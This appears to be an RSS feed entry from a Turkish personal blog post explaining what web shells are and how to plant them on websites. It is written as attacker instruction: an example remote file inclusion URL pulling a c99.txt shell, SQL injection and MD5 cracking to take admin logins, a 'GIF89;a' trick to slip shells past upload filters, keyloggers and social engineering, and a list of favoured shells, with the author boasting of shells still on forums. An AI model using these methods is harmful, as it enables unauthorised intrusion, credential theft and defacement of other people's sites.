<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>shell nedir arşivleri - Ertan Dönmez</title>
	<atom:link href="https://www.ertandonmez.org/tag/shell-nedir/feed/" rel="self" type="application/rss+xml" />
	<link></link>
	<description>Ertan Dönmez Kişisel Blog Sitesi.</description>
	<lastBuildDate>Sun, 28 Mar 2010 18:36:20 +0000</lastBuildDate>
	<language>tr</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1</generator>
	<item>
		<title>Shell Nedir? Nasıl Atılır? Neye Yarar?</title>
		<link>https://www.ertandonmez.org/shell-nedir-nasil-atilir-neye-yarar/</link>
					<comments>https://www.ertandonmez.org/shell-nedir-nasil-atilir-neye-yarar/#comments</comments>
		
		<dc:creator><![CDATA[Ertan]]></dc:creator>
		<pubDate>Sun, 28 Mar 2010 18:36:20 +0000</pubDate>
				<category><![CDATA[Güvenlik]]></category>
		<category><![CDATA[shell nasıl atılır]]></category>
		<category><![CDATA[shell nedir]]></category>
		<category><![CDATA[shell neye yarar]]></category>
		<guid isPermaLink="false">https://www.ertandonmez.org/?p=297</guid>

					<description><![CDATA[<p>Sorular. Maddeler. Başlıklar. 1) shell nedir? 2) shell Nasıl Atılır? 3) Kaç Tür shell Vardır? Cevaplar. 1) shell nedir? shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; Okuma, Yazma ve Silme Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya Permission Yetkisi Diyebiliriz. El Muhammed [&#8230;]</p>
<p><a href="https://www.ertandonmez.org/shell-nedir-nasil-atilir-neye-yarar/">Shell Nedir? Nasıl Atılır? Neye Yarar?</a> yazısı ilk önce <a href="https://www.ertandonmez.org">Ertan Dönmez</a> üzerinde ortaya çıktı.</p>
]]></description>
										<content:encoded><![CDATA[<p><img fetchpriority="high" decoding="async" class="alignleft" src="https://www.ertandonmez.org/wp-content/uploads/security.png" alt="security" width="311" height="392" /><br />
<strong><span style="color: red;">Sorular. Maddeler. Başlıklar.</span></strong><br />
<strong><span style="color: red;">1)</span></strong> <span style="color: blue;">shell nedir?<br />
</span><strong><span style="color: red;">2)</span></strong> <span style="color: blue;">shell Nasıl Atılır?<br />
</span><span style="color: red;"><strong>3)</strong></span> <span style="color: blue;">Kaç Tür shell Vardır?</span><br />
<strong><span style="color: red;">Cevaplar.<br />
</span></strong><br />
<strong><span style="color: red;">1) shell nedir?<br />
</span></strong><br />
shell Yüklendiği Sitede Size Çeşitli Yetkiler Veren Bir Materyaldir. Bu Yetkiler; <span style="color: green;">Okuma, Yazma ve Silme</span> Yetkileridir. shell Attığınız Sitede Bazen Bir Site Sahibinin Yetkilerini Kullanabilirken, Bazende Host Sahibinin Yetkilerini Kullana Biliyorsunuz. Bu Olaya <strong><span style="color: green;">Permission</span></strong> Yetkisi Diyebiliriz.<span id="more-297"></span><br />
El Muhammed arkadaşım bu konuyu iyi açıklamıştı zaten onun yazılarını şimdi size veriyorum okuyup bilgi sahibi olursunuz. Permissionları Açık Olan Bir Sunucuda İstediğiniz Bütün Dosya ve Klasöri <span style="color: green;">Okuyabilir, Silebilir veya Yükleme</span> Yapabilirsiniz. Permissionları Kapalı Bir Sunucuda İse Bu Yetkiler Sınırlıdır. Tam Yetkiye Ulaşabilmeniz İçin <span style="color: green;"><strong>Serveri Rootlamanız</strong></span> Gerekmektedir.<br />
Bir shelli En İyi Shelikde Kullanabilmek İçin <span style="color: green;">shell Komutlarını</span> İyi Bilmek Gerekir. Bunun Sebebi İse Sınırlı Yetkiniz Olan Sunucularda Tam Yetkiye Sahip Olmanız İçindir.<br />
Bir Çok Sunucuda <span style="color: green;">Manuel</span> Geçişlere İzin Verilmektedir. <span style="color: green;">Spoll/Mail</span> Kısmından Sunududaki Diğer Sitelerin Kullanıcı Adını Öğrenerek Adres Çucuğundan Manuel Geçişlerde Yapabilirsiniz.<br />
Bazı Durumlarda İse shell Yüklediğimiz Sitede Ya Permissionlar Sınırlı Yetkilere Sahiptir, Yada Yine Sadece Yüklediğimiz Sitede Sınırsız Yetkiye Sahip Olabiliyoruz. Burada Sınırsız Yetkimiz Var İse ve Sadece İndex Atıp Çıkmak İstiyorsak İndex.html Dosyamızı Upload Eder Çıkarız. Eyerki Yetkilerimiz Sınırlandırılmış İse Sitedeki <span style="color: green;">Config</span> Dosyalarını Okuyarak <span style="color: green;">SQL</span> İle Bağlantı Sağlaya Biliriz.<br />
shelli Ne İçin ve Hangi Aşamalarda Kullandığımızı Hacker Diliyle Anlattım Bir Diğer Maddeye Geçelim. Bu Maddemizde Anlamadığın veya Yeniden Anlatılmasını İstediğiniz Bir Yer Olursa Konu Aldında Belirtiniz.<br />
<strong><span style="color: red;">2) shell Nasıl Atılır?<br />
</span></strong><br />
<span style="color: blue;">Aşamaları:<br />
</span><strong>*</strong> <span style="color: blue;">Remote File Iclusion Açıklarından Faydalanabiliriz</span><br />
<strong>*</strong> <span style="color: blue;">SQL Injection Açıklarından Faydalanabiliriz</span><br />
<strong>*</strong> <span style="color: blue;">Exploits Kullanarak Yükleme Yapabiliriz</span><br />
<strong>*</strong> <span style="color: blue;">Upload Açıklarından Faydalanabiliriz</span><br />
<strong>*</strong> <span style="color: blue;">Logger vb Spy Yazılımlardan Faydalanabiliriz</span><br />
<strong>*</strong> <span style="color: blue;">Hedef Sunucudan Hesap Açarak Yükleme Yapabiliriz</span><br />
<strong>*</strong> <span style="color: blue;">Sosyal Mühendislik Kullanarak Yükleme Yapabiliriz</span><br />
<strong><span style="color: red;">1)</span></strong> Remote File Inclusion Açıklarını Kullanarak <span style="color: green;">.Txt</span> Uzantılı shellimizden Yukarıda Bahsetiğim Yetkiler Çerçevesinde (Permissionlar) İstediğimiz Gibi <span style="color: green;">.Php</span> Uzantılı shell Yükleyebiliriz. veya Bağlandığımız <span style="color: green;">.Txt</span> shell ile Yine Sunucu Yetkileri Çerçevesinde <span style="color: green;">Alt Dizinlere</span> Geçebiliriz yada İndeximizi Upload Eder Çıkarız.<br />
<span style="color: red;">Örnek:<br />
</span><br />
http://www.siteadi.com/İndex.php?denetim=Http://siteadi.com/c99.txt?<br />
İle Bağlandığımız Siteye <span style="color: green;">.php</span> Uzantılı shelli Upload Edersek Kullanımı Şu Şekilde Olur.<br />
http://www.siteadi.com/c99.php<br />
Şeklinde Kullanıma Geçebiliriz.<br />
RFI Konusunu Artık Bilmeyen Yok Şuanda RFI Bitmesede Çok Nadir Rastlanan Açıklar Haline Deldi. Bu Yüzden Bütün Hakcing Bilgilerinizi RFI Açığına Bağlamayın.<br />
<strong><span style="color: red;">2)</span></strong> SQL Injection Açığıyla Nasıl shell Atacaz. Öncelikle <span style="color: green;">SQL</span> Açığını Kullanmasını Bilen Mantığı Hemen Anlar, nedir Bu Mantık? SQL Kodları Yardımıyla Site Sahibinin <span style="color: green;">Kullanıcı Adı ve Şifresini</span> Elde Ediyoruz. Kimi Zaman <span style="color: green;">MD5</span> Seklinde Şifre Gelir, Bizde <strong><span style="color: #ff0000;">MD5 Cracker</span></strong> Yardımıyla Kırarız.<br />
Elde Ettiğimiz Kullanıcı Adı ve Şifre İle Siteye Giriş Yaparız <span style="color: green;">Admin Panelden </span>Bir <span style="color: green;">Upload</span> Yeri Bulur shell Dosyamızı (.php veya .asp) Upload Ederiz ve Yine Sunucuya Bağlanmış Oluruz.<br />
SQL Şuanda Kullanılan Yaygın Hacking Yöntemlerinden Biridir. Çok Büyük Sitelerde Bile Rastlanan Hiç Değilse Her Serverde En Az 1 den Fazla Sitede Rastlanan Açıktır.<br />
<strong><span style="color: red;">3)</span></strong> Exploits Kullanarak shell Atabiliriz Buda Yine <span style="color: green;">Derlenmiş Exploitler</span> Sayesinde Sitenin <span style="color: green;">Admin Bilgilerini (kullanıcı adı ve şifresini)</span> Elde Ederek Admin Panelden <span style="color: green;">shell Upload</span> Edebiliriz ve Yine Sunucuda Yetkilerimiz Dahilinde İşlem Yapabiliriz.<br />
Buna Şöyle Bir Örnek Vereyim, Bir Dönem IPB Forumlarında Exploits Sayesinde Admin Şifrelerine Ulaşabiliyorduk. Hala Çoğu IPB Forumlarında shellerim Bulunmakta.<br />
<strong><span style="color: red;">4)</span></strong> Upload Açıklarından Faydalanarak Sitelere shell Yükleyebiliriz. Burada Genellikle <span style="color: green;">.php veya .asp</span> Uzantılı shellerimizi Kabul Etmeyen Upload Siteleriyle Karşılaşıyoruz. Bunun İçin shell İçine <strong><span style="color: green;">GIF89;a</span></strong> Yazısını Ekleyerek Upload Sayfasının Yükleyeceğimiz shelli <span style="color: green;">Resim Dosyası</span> Olarak Görmesini Sağlarız.<br />
Aklınızın Almayacağı Kadar Çok Upload Dosyaları Vardır. Bunlardan En Çok Kullanılan Bir İki Tanesini Yazayım.<br />
<span style="color: green;">upload.php , upload.asp , upload.htm , upload.html</span><br />
Bu Uzantıları ve Upload Sayfalarını Hayal Gücünüze Bağlı Çoğalta Bilirsiniz.<br />
<strong><span style="color: red;">5)</span></strong> Hiç Tavsiye Etmediğim ve Hiç Kullanmadığım Ancak Buda Bir Hacking Yöntemi Olduğu İçin Açıklamak Zorunda Kaldığım Bir Yöntem. <span style="color: green;">Logger vb Spy</span> Yazılımlar Sayesinde shell Nasıl Atılır? Öncelikle Hedef Sitemizin Adminini Buluyoruz Gerekli SM vb İşlemleri Gerçekleştirdikten Sonra <span style="color: green;">Loggeri Yedirip Admin Şifreleride Dahil Olmak Üzere FTP ve Mail Şifrelerini Alırız.</span> Aldığımız Şifreler Sayesinde Site Sahibinin Yetkilerini Almamıza Rağmen <span style="color: green;">FTP</span> Sine Girdiğimiz Sitenin Sunusunada Ulaşmak İstiyorsan <span style="color: green;">shell Upload</span> Eder ve Yetkilerimiz Çerçevesinde İzinlerimizi Kullanarak Siteyi veya Serveri Hackleye Biliriz.<br />
<strong><span style="color: red;">6)</span></strong> Bu Maddemizde İse Diyelimki Hedef bir Site var. Sitede Her Şeyi Yapmamıza Rağmen Bir Türlü Açık Bulamadık. Genelde Son Çare Olarak Kullanılan Bu Yöntemle Hostcuyla İrtibata Geçer SM Yaparak Sunucudan Bir <span style="color: green;">Hesap Açarız</span> Açtığımız Hesapta Göz Boyamak Adına Ufak Tefek Portallar Kurar ve <span style="color: green;">FTP mize shell</span> Atarak Serveri Rootlar Hedef Siteye Ulaşırız veya Manuel Geçiler Yaparakda Hedef Siteye Ulaşabiliriz.<br />
<strong><span style="color: red;">7)</span></strong> Sosyal Mühendislik Yöntemiyle Siteye shell Yükleye Biliriz. Burada İşin İçine <span style="color: green;">SM</span> Girdiği İçin Belirli Bir Yöntem Yoktur. Ancak SM Yapan Kişinin Kabiliyetine Bağlıdır. Bir Kişi Sosyal Mühendislik Yapabilecek Kabiliyetteyse Çok Kolay ve Rahat Bir Şekilde Çeşitli Yollarla Siteye veya FTP ye Ulaşarak shell Atabilir.<br />
shell Nasıl Atılır Maddemizde Burada Bitmiştir. Yukarıda Belirttiğim 7 Madde Çoğaltılabilir. Bu Konuda da Anlamadığınız veya Daha Detaylı Anlatmamı İstediğiniz Yerleri Konu Altına Belirtirseniz Farklı veya Daha Geniş Anlatımlar Yapabilirim.<br />
<strong><span style="color: red;">3) Kaç Tür shell Vardır?<br />
</span></strong><br />
Genel Olarak Kullanılan 2, 3 Çeşit shell Vardır. Bunarın Uzantıları .<span style="color: green;">php, .asp ve .aspx</span> Dir. Şuanda Zannediyorum 100 lerce shell Var Ancak Hemen Hemen Hepsinin Çalışma Mantığı Aynı. <strong>El Muhammed</strong> arkadaşım shell konusunda zaten çok bilgilidir. Makaleyide çok güzel hazırlamış. Sizler iyi yararlanırsınız.<br />
<span style="color: blue;">Ençok Kullanılan sheller:</span><br />
<span style="color: green;">C99.php (Yeni Başlayanlar İçin Kullanımı Kolay Bir shell)<br />
</span><span style="color: blue;">R57.php ( shell Olayını Artık Çözmüş Kod Bilgisine Döken Kişiler Kullanıyor)<br />
</span><span style="color: red;">CyberSpy5.asp ( Genelde Kullandığım sheller Arasındadır.)</span><br />
<span style="color: orange;">LORD.aspx ( Zaman Zaman Kullandığım Bir shelldir.)</span><br />
<span style="color: brown;">c99 veya r57 .txt sheller ( Bunlar RFI İçin Kullanılan shellerdir)<br />
</span><strong><span style="color: red;">NOT:</span></strong> RFI de <span style="color: green;">.asp</span> shell veya <span style="color: green;">.php</span> shell Kullanılmaz.<br />
Şimdi Şöyle Bir Bakalım.<br />
<span style="color: green;">.php</span> Uzantılı sheller <span style="color: red;">Unix, Linux, FreeBSD</span> Sunucularında Kullanılır.<br />
<span style="color: green;">.asp</span> Uzantılı sheller İse <span style="color: red;">Windows </span>Sunucularda Kullanılır.<br />
Şimdi Siz Bir <span style="color: red;">Linux Servere</span> <span style="color: green;">.asp</span> Uzantılı shell <strong>Atamazsınız</strong> Atsanız Dahi <strong>Çalıştıramazsınız.<br />
</strong><br />
Ancak <span style="color: red;">Windows</span> <span style="color: red;">Serverlere</span> Nadirende Olsa Rastlamışımdır. <span style="color: green;">.php</span> Uzantılı sheller <strong>Atılabiliryor.</strong> Ancak <span style="color: green;">.asp</span> shell Kadar Yetki <strong>Vermiyor</strong>. Genelde <span style="color: green;">Editleme</span> Yetkisine Rastladım. Yükleme ve Silme Yetkileri <strong>Bulunmamakta.</strong><br />
Bu Yüzden shell Yükleyeceğiniz Sitenin <strong>Sistemi </strong>İyi Bilmeniz Gerekiyor.</p>
<p><a href="https://www.ertandonmez.org/shell-nedir-nasil-atilir-neye-yarar/">Shell Nedir? Nasıl Atılır? Neye Yarar?</a> yazısı ilk önce <a href="https://www.ertandonmez.org">Ertan Dönmez</a> üzerinde ortaya çıktı.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.ertandonmez.org/shell-nedir-nasil-atilir-neye-yarar/feed/</wfw:commentRss>
			<slash:comments>16</slash:comments>
		
		
			</item>
	</channel>
</rss>
